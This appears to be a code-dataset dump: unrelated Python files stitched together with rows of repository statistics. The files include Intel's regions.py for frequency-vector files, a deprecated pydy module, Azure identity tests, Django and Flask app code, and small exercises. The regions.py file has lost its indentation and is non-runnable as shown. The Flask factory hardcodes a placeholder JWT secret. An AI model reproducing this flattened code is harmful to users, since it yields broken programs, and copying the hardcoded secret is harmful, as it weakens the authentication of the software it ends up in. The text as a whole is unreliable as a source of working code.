# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE INTEL OR
# ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# END_LEGAL
#
#
# @ORIGINAL_AUTHORS: T. Mack Stallcup, Cristiano Pereira, Harish Patil, Chuck Yount
#
#
# Read in a file of frequency vectors (BBV or LDV) and execute one of several
# actions on it. Default is to generate a regions CSV file from a BBV file.
# Other actions include:
# normalizing and projecting FV file to a lower dimension
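# Example invocation for the default action (illustrative file names):
#   regions.py --region_file app.simpoints --weight_file app.weights app.bb > app.pinpoints.csv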
#
# $Id: regions.py,v 1.11.1.9 2014/06/09 23:30:44 tmstall Exp tmstall $
import datetime
import glob
import optparse
import os
import random
import re
import sys
import cmd_options
import msg
import util
def GetOptions():
"""
Get users command line options/args and check to make sure they are correct.
@return List of options and 3 file pointers: fp_bbv, fp_simp, fp_weight
"""
version = '$Revision: 1.11.1.9 $'; version = version.replace('$Revision: ', '')
ver = version.replace(' $', '')
us = '%prog [options] FVfile'
desc = 'Implements several different actions to process FV (Frequency Vector) files ' \
'such as BBV and LDV files. ' \
'All actions requires a FV file as an argument, while some require additional ' \
'options. ' \
' '\
'--------------------------------------------'\
' '\
'Default action is to generate a regions CSV file (--csv_region), which requires additional '\
'options --region_file and --weight_file. '
parser = optparse.OptionParser(usage=us, version=ver, description=desc)
# Command line options to control script behavior.
#
# import pdb; pdb.set_trace()
cmd_options.csv_region(parser, '')
cmd_options.focus_thread(parser, '')
# cmd_options.bbv_file(parser) # Currently, don't use this option as FV file is required
cmd_options.project_bbv(parser, '')
cmd_options.region_file(parser, '')
cmd_options.weight_file(parser, '')
# Parse command line options and get any arguments.
#
(options, args) = parser.parse_args()
# If user does not chose an action to perform, then run the
# default: region CSV generation
#
if not options.project_bbv:
options.csv_region = True
# Must at least define a FV file.
#
if hasattr(options, 'bbv') and options.bbv_file != '':
bbv_file = options.bbv_file
else:
if len(args) < 1:
msg.PrintAndExit('Must have at least a FVfile as an argument.\n'
'Use -h to get help')
bbv_file = args[0]
# Check to make sure valid FV file exists.
#
# import pdb; pdb.set_trace()
err_msg = lambda string: msg.PrintAndExit('This is not a valid file, ' + string + \
'\nUse -h for help.')
bbv_str = "basic block vector file: "
if hasattr(options, 'bbv_file') and options.bbv_file == '':
bbv_file = args[0]
if not os.path.isfile(bbv_file):
err_msg(bbv_str + bbv_file)
# BBV file must have at least one line which starts with 'T:'.
#
fp_bbv = util.OpenCompressFile(bbv_file)
if fp_bbv == None:
err_msg(bbv_str + bbv_file)
line = fp_bbv.readline()
while not line.startswith('T:') and line != '':
line = fp_bbv.readline()
if not line.startswith('T:'):
        err_msg(bbv_str + bbv_file)
fp_bbv.seek(0,0)
# If required, look for additional files.
#
fp_simp = fp_weight = None
if options.csv_region:
sim_str = "simpoints file: "
weight_str = "weights file: "
simp_file = options.region_file
weight_file = options.weight_file
if not os.path.isfile(simp_file):
err_msg(sim_str + simp_file)
if not os.path.isfile(weight_file):
err_msg(weight_str + weight_file)
# Simpoints file must start with an integer.
#
fp_simp = util.OpenCompressFile(simp_file)
if fp_simp == None:
err_msg(sim_str + simp_file)
line = fp_simp.readline()
l_list = line.split()
if not l_list[0].isdigit():
err_msg(sim_str + simp_file)
# Weight file must either have a floating point number < 1.0 as the first
# value in the file or the first line must be two integers. (The first
        # integer is assumed to be '1', i.e. a slice with weight 1. Should never get
# a weight > 1.)
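        # Typical weights-file lines (illustrative values): "0.50173 0", or
        # "1 0" for a single region carrying all the weight.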
#
fp_weight = util.OpenCompressFile(weight_file)
if fp_weight == None:
err_msg(weight_str + weight_file)
line = fp_weight.readline()
l_list = line.split()
if '.' not in l_list[0] and not re.search('\d\s\d', line):
err_msg(weight_str + weight_file)
fp_simp.seek(0,0)
fp_weight.seek(0,0)
return (options, fp_bbv, fp_simp, fp_weight)
def GetSlice(fp):
"""
Get the frequency vector for one slice (i.e. line in the FV file).
All the frequency vector data for a slice is contained in one line. It
starts with the char 'T'. After the 'T', there should be a sequence of
the following tokens:
':' integer ':' integer
where the first integer is the dimension index and the second integer is
the count for that dimension. Ignore any whitespace.
@return list of the frequency vectors for a slice, element = (dimension, count)
"""
fv = []
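    # Illustrative slice line: "T:45:1024 :50:3 :62:17" (dimension:count pairs).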
line = fp.readline()
while not line.startswith('T:') and line != '':
# print 'Skipping line: ' + line
# Don't want to skip the part of BBV files at the end which give
# information on the basic blocks in the file. If 'Block id:' is
# found, then back up the file pointer to before this string.
#
if line.startswith('Block id:'):
fp.seek(0-len(line), os.SEEK_CUR)
return []
line = fp.readline()
if line == '': return []
blocks = re.findall(':\s*(\d+)\s*:\s*(\d+)\s*', line)
# print 'Slice:'
for block in blocks:
# print block
bb = int(block[0])
count = int(block[1])
fv.append((bb, count))
# import pdb; pdb.set_trace()
return fv
def GetBlockIDs(fp):
"""
Get the information about each basic block which is stored at the end
of BBV frequency files.
Extract the values for fields 'block id' and 'static instructions' from
each block. Here's an example block id entry:
Block id: 2233 0x69297ff1:0x69297ff5 static instructions: 2 block count: 1 block size: 5
@return list of the basic block info, elements are (block_id, icount of block)
"""
block_id = []
line = fp.readline()
while not line.startswith('Block id:') and line != '':
line = fp.readline()
if line == '': return []
while line.startswith('Block id:'):
bb = int(line.split('Block id:')[1].split()[0])
bb -= 1 # Change BBs to use 0 based numbering instead of 1 based
icount = int(line.split('static instructions:')[1].split()[0])
block_id.append((bb, icount))
line = fp.readline()
# import pdb; pdb.set_trace()
return block_id
############################################################################
#
# Functions for generating regions CSV files
#
############################################################################
def GetWeights(fp):
"""
Get the regions and weights from a weights file.
@return lists of regions and weights
"""
weight_list = []
weight_regions = []
for line in fp.readlines():
field = re.match('(0\.\d+).*(\d+)', line)
# Look for the special case where the first field is a single digit
# without the decimal char '.'. This should be the weight of '1'.
#
if field == None:
field = re.match('(\d)\s(\d)', line)
if field:
weight = float(field.group(1))
region = int(field.group(2))
weight_list.insert(region, weight)
weight_regions.append(region)
return weight_list, weight_regions
def GetSimpoints(fp):
"""
Get the regions and slices from the Simpoint file.
@return list of regions and slices from a Simpoint file
"""
slice_list = []
simp_regions = []
for line in fp.readlines():
field = re.match('(\d+).*(\d+)', line)
if field:
slice_num = int(field.group(1))
region = int(field.group(2))
slice_list.insert(region, slice_num)
simp_regions.append(region)
return slice_list, simp_regions
def GetRegionBBV(fp):
"""
Read all the frequency vector slices and the basic block id info from a
basic block vector file. Put the data into a set of lists which are used
in generating CSV regions.
@return cumulative_icount, all_bb, bb_freq, bb_num_instr, region_bbv
"""
# Dictionary which contains the number of instructions in each BB.
# Key is basic block number.
#
bb_num_instr = {}
# Dictionary which contains the number of times a BB was executed
# Key is basic block number.
#
bb_freq = {}
# Currently not set by the function. May use in the future for calculating
# coverage.
#
# List of BB vectors for each representative region. Each element is
# a dictionary keyed on BB number with the icount of the block in that
# specific slice.
#
region_bbv = []
# Set of all BB found in the BBV file. Each element
# is a tuple with the BB number and # of instr in BB.
#
all_bb = []
# List of the cumulative sum of instructions in the slices. There is one
# entry for each slice in the BBV file which contains the total icount up
# to the end of the slice.
#
cumulative_icount = []
# Cumulative sum of instructions so far
#
run_sum = 0
# Get each slice & generate some data on it.
#
while True:
fv = GetSlice(fp)
if fv == []:
break
# print fv
# Get icount for BB in slice and record the cumulative icount.
#
sum = 0
for bb in fv:
count = bb[1]
sum += count
# Add the number instructions for the current BB to total icount for
# this specific BB (bb_num_instr).
#
bb_num_instr[bb] = bb_num_instr.get(bb, 0) + count
# Increment the number of times this BB number has been encountered
#
bb_freq[bb] = bb_freq.get(bb, 0) + 1
if sum != 0:
run_sum += sum
cumulative_icount += [run_sum]
# import pdb; pdb.set_trace()
# Read the basic block information at the end of the file if it exists.
#
# import pdb; pdb.set_trace()
all_bb = GetBlockIDs(fp)
# if all_bb != []:
# print 'Block ids'
# print all_bb
# The list 'all_bb' should contain one entry for each basic block in the
# application (and the corresponding icount). Check to see if there are
# any missing BB entries in the list 'all_bb'. If there are, then add them
# to the list with an icount of 0. Sort the final list so the icount can
# be accessed by BB number in constant time.
#
# import pdb; pdb.set_trace()
if all_bb != []:
all_bb.sort(key=lambda bb: bb[0])
length = len(all_bb)
max_bb_num = all_bb[length-1][0] # Last list entry has the total number of BB
if max_bb_num+1 > length:
# Missing at least one BB entry in the list.
#
array_index = 0 # Used to access the next entry in the list
count = 0 # Used to loop thru the list
while count <= length:
if all_bb[array_index][0] != count:
# Missing this BB entry in the list. Add the missing BB tuple
# with icount = 0
#
all_bb.append((array_index, 0))
count += 1 # Skip the 'missing' entry
array_index += 1
count += 1
all_bb.sort(key=lambda bb: bb[0]) # Sort once missing entries are added
# import pdb; pdb.set_trace()
return cumulative_icount, all_bb, bb_freq, bb_num_instr, region_bbv
def CheckRegions(simp_regions, weight_regions):
"""
Check to make sure the simpoint and weight files contain the same regions.
@return no return value
"""
if len(simp_regions) != len(weight_regions) or \
set(simp_regions) != set(weight_regions):
msg.PrintMsg('ERROR: Regions in these two files are not identical')
msg.PrintMsg(' Simpoint regions: ' + str(simp_regions))
msg.PrintMsg(' Weight regions: ' + str(weight_regions))
cleanup()
sys.exit(-1)
def GenRegionCSV(options, fp_bbv, fp_simp, fp_weight):
"""
Read in three files (BBV, weights, simpoints) and print to stdout
a regions CSV file which defines the representative regions.
@return no return value
"""
# Read data from weights, simpoints and BBV files.
# Error check the regions.
#
weight_list, weight_regions = GetWeights(fp_weight)
slice_list, simp_regions = GetSimpoints(fp_simp)
cumulative_icount, all_bb, bb_freq, bb_num_instr, region_bbv = GetRegionBBV(fp_bbv)
CheckRegions(simp_regions, weight_regions)
total_num_slices = len(cumulative_icount)
total_instr = cumulative_icount[len(cumulative_icount)-1]
# import locale
# locale.setlocale(locale.LC_ALL, "")
# total_instr = locale.format('%d', total_instr, True)
# total_bb_icount = locale.format('%d', total_bb_icount, True)
# Print header information
#
msg.PrintMsgNoCR('# Regions based on: ')
for string in sys.argv:
msg.PrintMsgNoCR(string + ' '),
msg.PrintMsg('')
msg.PrintMsg('# comment,thread-id,region-id,simulation-region-start-icount,simulation-region-end-icount,region-weight')
# msg.PrintMsg('')
# Print region information
#
# import pdb; pdb.set_trace()
if options.focus_thread != -1:
tid = int(options.focus_thread)
else:
tid = 0
total_icount = 0
region = 1 # First region is always numbered 1
for slice_num, weight in zip(slice_list, weight_list):
if slice_num == 0:
# If this is the first slice, set the initial icount to 0
#
start_icount = 0
else:
# Use cumulative icount of previous slice to get the initial
# icount of this slice.
#
start_icount = cumulative_icount[slice_num-1]+1
end_icount = cumulative_icount[slice_num]
length = end_icount - start_icount + 1
total_icount += length
msg.PrintMsg('# Region = %d Slice = %d Icount = %d Length = %d Weight = %.5f' % \
(region, slice_num, start_icount, length, weight))
msg.PrintMsg('Cluster %d from slice %d,%d,%d,%d,%d,%.5f\n' % \
(region-1, slice_num, tid, region, start_icount, end_icount, weight))
region +=1
# Currently does nothing as 'region_bbv' is always null (at least for now.)
#
# Get a set which contains BBs of all representative regions
#
all_region_bb = set()
for bbv in region_bbv:
region_bb = 0
for bb in bbv:
all_region_bb.add(bb)
bb, icount = all_bb[bb-1]
region_bb += int(icount)
print 'Trace coverage: %.4f' % (float(region_bb)/total_instr)
# Get total number of instructions for BBs in representative regions
#
region_bb_icount = 0
for num in all_region_bb:
bb, icount = all_bb[num-1]
region_bb_icount += int(icount)
# Print summary statistics
#
# import pdb; pdb.set_trace()
msg.PrintMsg('# Total instructions in %d regions = %d' % (len(simp_regions), total_icount))
msg.PrintMsg('# Total instructions in workload = %d' % cumulative_icount[total_num_slices-1])
msg.PrintMsg('# Total slices in workload = %d' % total_num_slices)
# msg.PrintMsg('# Overall dynamic coverage of workload by these regions = %.4f' \
# % (float(region_bb_icount)/total_bb_icount))
############################################################################
#
# Functions for normalization and projection
#
############################################################################
def GetDimRandomVector(proj_matrix, proj_dim, dim):
"""
Get the random vector for dimension 'dim'. If it's already in 'proj_matrix',
then just return it. Otherwise, generate a new random vector of length
'proj_dim' with values between -1 and 1.
@return list of length 'dim' which contains vector of random values
"""
# import pdb; pdb.set_trace()
if proj_matrix.has_key(dim):
# print 'Using random vector: %4d' % dim
vector = proj_matrix.get(dim)
else:
# print 'Generating random vector: %4d' % dim
random.seed() # Use default source for seed
vector = []
index = 0
while index < proj_dim:
vector.append(random.uniform(-1, 1))
index += 1
proj_matrix[dim] = vector
return vector
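# Note on the projection (descriptive only): each basic-block dimension gets one fixed
# random vector of length proj_dim, so a sparse frequency vector of arbitrary width can
# be folded into a dense proj_dim-length vector by accumulating count * random_vector
# per block, as done in ProjectFVFile() below.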
def ProjectFVFile(fp, proj_dim=15):
"""
Read all the slices in a frequency vector file, normalize them and use a
random projection matrix to project them onto a result matrix with dimensions:
num_slices x proj_dim.
@return list of lists which contains the result matrix
"""
# Dictionary which contains the random projection matrix. The keys are the
# FV dimension (NOT the slice number) and the value is a list of random
# values with length 'proj_dim'.
#
proj_matrix = {}
# List of lists which contains the result matrix. One element for each slice.
#
result_matrix = []
while True:
fv = GetSlice(fp)
if fv == []:
break
# Get the sum of all counts for this slice for use in normalizing the
# dimension counts.
#
# import pdb; pdb.set_trace()
# print fv
vector_sum = 0
for block in fv:
vector_sum += block[1]
# Initilize this slice/vector of the result matrix to zero
#
result_vector = [0] * proj_dim
# For each element in the slice, project using the "dimension of the
# element", not the element index itself!
#
sum = 0
# import pdb; pdb.set_trace()
for block in fv:
dim = block[0]
# print 'Dim: %4d' % dim
count = float(block[1]) / vector_sum # Normalize freq count
# Get the random vector for the dimension 'dim' and project the values for
# 'dim' into the result
#
proj_vector = GetDimRandomVector(proj_matrix, proj_dim, dim)
index = 0
while index < proj_dim:
result_vector[index] += count * proj_vector[index]
index += 1
result_matrix.append(result_vector)
# import pdb; pdb.set_trace()
return result_matrix
def PrintFloatMatrix(matrix):
"""
Print a matrix composed of a list of list of floating point values.
@return no return value.
"""
index = 0
while index < len(matrix):
slice = matrix[index]
for block in slice:
# print '%6.8f' % block,
print '%6.3f' % block,
print
index += 1
def cleanup():
"""
Close all open files and any other cleanup required.
@return no return value
"""
fp_bbv.close()
if fp_simp:
fp_simp.close()
if fp_weight:
fp_weight.close()
############################################################################
options, fp_bbv, fp_simp, fp_weight = GetOptions()
if options.project_bbv:
result_matrix = ProjectFVFile(fp_bbv)
PrintFloatMatrix(result_matrix)
else:
GenRegionCSV(options, fp_bbv, fp_simp, fp_weight)
cleanup()
sys.exit(0)
| 33.809006 | 123 | 0.606715 | 2,926 | 21,773 | 4.407724 | 0.175325 | 0.007366 | 0.013026 | 0.016283 | 0.183066 | 0.136931 | 0.074746 | 0.059084 | 0.028224 | 0.022176 | 0 | 0.009848 | 0.286456 | 21,773 | 643 | 124 | 33.861586 | 0.820288 | 0.318514 | 0 | 0.225 | 0 | 0.007143 | 0.112127 | 0.016388 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.035714 | null | null | 0.010714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
803a46dade15dfe7d529009beb897901bfbdb1e7 | 2,918 | py | Python | pydy/codegen/code.py | jcrist/pydy | ec139f0dcbeffba8242636b727b3be02091792b0 | [
"BSD-3-Clause"
] | 1 | 2019-06-27T05:30:36.000Z | 2019-06-27T05:30:36.000Z | pydy/codegen/code.py | jcrist/pydy | ec139f0dcbeffba8242636b727b3be02091792b0 | [
"BSD-3-Clause"
] | null | null | null | pydy/codegen/code.py | jcrist/pydy | ec139f0dcbeffba8242636b727b3be02091792b0 | [
"BSD-3-Clause"
] | 1 | 2019-06-27T05:29:50.000Z | 2019-06-27T05:29:50.000Z | #!/usr/bin/env python
"""This module remains for backwards compatibility reasons and will be
removed in PyDy 0.4.0."""
import warnings
from .ode_function_generators import generate_ode_function as new_gen_ode_func
with warnings.catch_warnings():
warnings.simplefilter('once')
warnings.warn("This module, 'pydy.codgen.code', is deprecated. The "
"function 'generate_ode_function' can be found in the "
"'pydy.codegen.ode_function_generator' module. "
"'CythonGenerator' has been removed, use "
"'pydy.codegen.cython_code.CythonMatrixGenerator' "
"instead.",
DeprecationWarning)
class CythonGenerator(object):
def __init__(self, *args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter('once')
warnings.warn("'CythonGenerator' has been removed, use "
"'pydy.codegen.cython_code.CythonMatrixGenerator' "
"instead.", DeprecationWarning)
def generate_ode_function(mass_matrix, forcing_vector, constants,
coordinates, speeds, specified=None,
generator='lambdify'):
"""Returns a numerical function which can evaluate the right hand side
of the first order ordinary differential equations from a system
described by:
M(constants, coordinates) x' = F(constants, coordinates, speeds, specified)
Parameters
----------
mass_matrix : sympy.Matrix, shape(n,n)
The symbolic mass matrix of the system. The rows should correspond
to the coordinates and speeds.
forcing_vector : sympy.Matrix, shape(n,1)
The symbolic forcing vector of the system.
constants : list of sympy.Symbol
The constants in the equations of motion.
coordinates : list of sympy.Function
The generalized coordinates of the system.
speeds : list of sympy.Function
The generalized speeds of the system.
specified : list of sympy.Function
The specifed quantities of the system.
generator : string, {'lambdify'|'theano'|'cython'}, optional
The method used for generating the numeric right hand side.
Returns
-------
evaluate_ode_function : function
A function which evaluates the derivaties of the states.
"""
with warnings.catch_warnings():
warnings.simplefilter('once')
warnings.warn("This function is deprecated and will be removed in "
"PyDy 0.4.0. Use the the new 'generate_ode_function' "
"in 'pydy.codegen.ode_function_generator'",
DeprecationWarning)
return new_gen_ode_func(forcing_vector, coordinates, speeds, constants,
mass_matrix=mass_matrix, specifieds=specified,
generator=generator)
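# Migration sketch (illustrative; it simply mirrors the wrapper call above):
#
#     from pydy.codegen.ode_function_generators import generate_ode_function
#     rhs = generate_ode_function(forcing_vector, coordinates, speeds, constants,
#                                 mass_matrix=mass_matrix, specifieds=specified,
#                                 generator='lambdify')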
| 39.972603 | 79 | 0.643934 | 322 | 2,918 | 5.717391 | 0.363354 | 0.0478 | 0.029875 | 0.040739 | 0.319935 | 0.274307 | 0.238457 | 0.238457 | 0.238457 | 0.178164 | 0 | 0.003318 | 0.276902 | 2,918 | 72 | 80 | 40.527778 | 0.869194 | 0.391707 | 0 | 0.333333 | 1 | 0 | 0.305656 | 0.129964 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
803e4182cc11eec12d785bce525dec0268a1a586 | 749 | py | Python | sdk/identity/azure-identity/tests/test_imds_credential_async.py | anuchandy/azure-sdk-for-python | 589b9890554ebf261aa2184e8f1c6507f01a207c | [
"MIT"
] | null | null | null | sdk/identity/azure-identity/tests/test_imds_credential_async.py | anuchandy/azure-sdk-for-python | 589b9890554ebf261aa2184e8f1c6507f01a207c | [
"MIT"
] | null | null | null | sdk/identity/azure-identity/tests/test_imds_credential_async.py | anuchandy/azure-sdk-for-python | 589b9890554ebf261aa2184e8f1c6507f01a207c | [
"MIT"
] | null | null | null | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from azure.identity.aio._credentials.managed_identity import ImdsCredential
import pytest
from helpers_async import AsyncMockTransport
@pytest.mark.asyncio
async def test_imds_close():
    transport = AsyncMockTransport()
    credential = ImdsCredential(transport=transport)

    await credential.close()

    assert transport.__aexit__.call_count == 1
@pytest.mark.asyncio
async def test_imds_context_manager():
    transport = AsyncMockTransport()
    credential = ImdsCredential(transport=transport)

    async with credential:
        pass

    assert transport.__aexit__.call_count == 1
| 24.16129 | 75 | 0.691589 | 73 | 749 | 6.849315 | 0.534247 | 0.04 | 0.068 | 0.088 | 0.528 | 0.528 | 0.132 | 0 | 0 | 0 | 0 | 0.003125 | 0.145527 | 749 | 30 | 76 | 24.966667 | 0.778125 | 0.189586 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0 | false | 0.0625 | 0.1875 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
803fc0980572bedb582462a274dae0d462a1eb72 | 241 | py | Python | sololearn/hovercraft.py | ehlodex/Python3 | 126c4662d1371ec6cbc1f257bd3de5c1dcdc86a6 | [
"MIT"
] | null | null | null | sololearn/hovercraft.py | ehlodex/Python3 | 126c4662d1371ec6cbc1f257bd3de5c1dcdc86a6 | [
"MIT"
] | null | null | null | sololearn/hovercraft.py | ehlodex/Python3 | 126c4662d1371ec6cbc1f257bd3de5c1dcdc86a6 | [
"MIT"
] | null | null | null | #!/usr/bin/env/ python3
"""SoloLearn > Code Coach > Hovercraft"""
sales = int(input('How many did you sell? ')) * 3
expense = 21
if sales > expense:
    print('Profit')
elif sales < expense:
    print('Loss')
else:
    print('Broke Even')
| 18.538462 | 49 | 0.630705 | 33 | 241 | 4.606061 | 0.818182 | 0.157895 | 0.223684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020725 | 0.19917 | 241 | 12 | 50 | 20.083333 | 0.766839 | 0.240664 | 0 | 0 | 0 | 0 | 0.242938 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8040774ec7da6d6e9a3a5ad4d793d25841c16e92 | 2,522 | py | Python | RSAMessengerDapp/User/views.py | slothmanxyz/RSAMessengerDapp | 3c5966196cac7749ea87ce0f42c47d159eb2ad14 | [
"MIT"
] | null | null | null | RSAMessengerDapp/User/views.py | slothmanxyz/RSAMessengerDapp | 3c5966196cac7749ea87ce0f42c47d159eb2ad14 | [
"MIT"
] | null | null | null | RSAMessengerDapp/User/views.py | slothmanxyz/RSAMessengerDapp | 3c5966196cac7749ea87ce0f42c47d159eb2ad14 | [
"MIT"
] | 1 | 2021-04-05T13:27:02.000Z | 2021-04-05T13:27:02.000Z | from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.forms import AuthenticationForm
from web3 import Web3
from .forms import SignupForm
from Key.models import Key

# The views and templates in this app are placeholders. Will use the ones in the Pages app instead later.
# Currently deployed to local hardhat network only
provider = Web3.HTTPProvider('http://127.0.0.1:8545/')
web3 = Web3(provider)


# Create your views here.
def home_view(request):
    context = {}
    if not request.user.is_authenticated:
        return render(request, 'User/home.html', context)
    else:
        return redirect('dashboard')


def dashboard_view(request):
    context = {}
    if not request.user.is_authenticated:
        return redirect('home')
    else:
        context['username'] = request.user.username
        context['address'] = request.user.address
        context['balance'] = web3.fromWei(web3.eth.get_balance(request.user.address), 'ether')
        context['keys'] = Key.objects.filter(user=request.user, is_main_key=True)
        return render(request, 'User/dashboard.html', context)


def signup_view(request):
    context = {}
    if request.POST:
        form = SignupForm(request.POST)
        if form.is_valid():
            form.save()
            username = form.cleaned_data.get('username')
            password = form.cleaned_data.get('password1')
            user = authenticate(username=username, password=password)
            login(request, user)
            return redirect('home')
        else:
            context['signup_form'] = form
    else:
        form = SignupForm()
        context['signup_form'] = form
    return render(request, 'User/signup.html', context)


def login_view(request):
    context = {}
    if request.POST:
        form = AuthenticationForm(request=request, data=request.POST)
        if form.is_valid():
            username = form.cleaned_data.get('username')
            password = form.cleaned_data.get('password')
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
                return redirect('home')
        else:
            context['login_form'] = form
    else:
        form = AuthenticationForm()
        context['login_form'] = form
    return render(request, 'User/login.html', context)


def logout_request(request):
    logout(request)
return redirect('home') | 34.081081 | 104 | 0.657811 | 296 | 2,522 | 5.537162 | 0.290541 | 0.080537 | 0.043929 | 0.04881 | 0.377669 | 0.363636 | 0.23795 | 0.195241 | 0.140329 | 0.140329 | 0 | 0.009326 | 0.234734 | 2,522 | 74 | 105 | 34.081081 | 0.839896 | 0.069389 | 0 | 0.483871 | 0 | 0 | 0.092537 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.080645 | false | 0.064516 | 0.112903 | 0 | 0.33871 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
8041201eb138a5c9f79a0273b50738c537af71ad | 398 | py | Python | app/__init__.py | Paulvitalis200/Store-Manager-API | d61e91bff7fc242da2a93d1caf1012465c7c904a | [
"MIT"
] | null | null | null | app/__init__.py | Paulvitalis200/Store-Manager-API | d61e91bff7fc242da2a93d1caf1012465c7c904a | [
"MIT"
] | 4 | 2018-10-21T18:28:03.000Z | 2018-10-24T12:48:24.000Z | app/__init__.py | Paulstar200/Store-Manager-API | d61e91bff7fc242da2a93d1caf1012465c7c904a | [
"MIT"
] | null | null | null | from flask import Flask, Blueprint
from flask_jwt_extended import JWTManager


def create_app(config):
    app = Flask(__name__)
    from instance.config import app_config
    app.config.from_object(app_config[config])
    app.config['JWT_SECRET_KEY'] = 'jwt-secret-string'
    from .api.V1 import productsale_api as psa
    app.register_blueprint(psa)
    jwt = JWTManager(app)
    return app
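# Minimal usage sketch (the 'development' key is illustrative; it must exist in
# instance/config.py's app_config mapping):
#
#     from app import create_app
#     app = create_app('development')
#     app.run()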
| 22.111111 | 54 | 0.738693 | 56 | 398 | 5 | 0.428571 | 0.160714 | 0.085714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003067 | 0.180905 | 398 | 17 | 55 | 23.411765 | 0.855828 | 0 | 0 | 0 | 0 | 0 | 0.077889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.545455 | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
8044c8aa6dbc56f89bc318d636c18413c449c80a | 599 | py | Python | code/modern-python/quadratic.py | dushyantkhosla/testing4ds | e6f69f7ff46225a491da00ac994e036633d0ca64 | [
"MIT"
] | null | null | null | code/modern-python/quadratic.py | dushyantkhosla/testing4ds | e6f69f7ff46225a491da00ac994e036633d0ca64 | [
"MIT"
] | null | null | null | code/modern-python/quadratic.py | dushyantkhosla/testing4ds | e6f69f7ff46225a491da00ac994e036633d0ca64 | [
"MIT"
] | null | null | null | from math import sqrt
from typing import Tuple


def quadratic(a: float, b: float, c: float) -> Tuple[float, float]:
    '''Compute roots of the quadratic equation:
        a*x**2 + b*x + c = 0

    For example:
    >>> x1, x2 = quadratic(a=4, b=11, c=7)
    >>> x1
    -1.0
    >>> x2
    -1.75
    >>> 4*x1**2 + 11*x1 + 7
    0.0
    >>> 4*x2**2 + 11*x2 + 7
    0.0
    '''
    discriminant = sqrt(b**2.0 - 4.0*a*c)
    x1 = (-b + discriminant) / (2.0 * a)
    x2 = (-b - discriminant) / (2.0 * a)
    return x1, x2
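# Optional addition (not part of the original exercise): run the doctests above when
# this module is executed directly.
if __name__ == '__main__':
    import doctest
    doctest.testmod()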
